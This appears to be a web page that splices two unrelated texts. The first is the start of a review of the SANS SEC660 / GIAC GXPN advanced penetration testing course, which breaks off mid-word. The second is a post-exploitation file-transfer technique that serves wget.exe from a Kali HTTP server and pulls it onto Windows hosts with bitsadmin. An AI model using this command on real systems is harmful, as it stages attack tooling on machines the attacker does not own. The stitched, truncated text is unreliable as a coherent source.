GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking) Intro SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma
On Kali : Set up an HTTP listener someplace where the wget.exe file can be fetched: cd /usr/share/windows-binaries/ python -m SimpleHTTPServer 80 On Windows : Create or change to a directory where your current user has permissions to create files: mkdir \temp cd \temp Get the wget.exe file: set HOSTIP=10.0.0.22 cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe" Tested and working on default installs of: Windows Vista 32 bit Windows vista 64 bit Windows server 2008 standard SP1 32 bit Windows 7 SP1 32 bit Windows 7 SP1 64 bit Windows 8 32 bit Windows 8 64 bit Windows server 2012 64 bit Did not work on Windows versions prior to Vista and is deprecated and not working on Windows 10.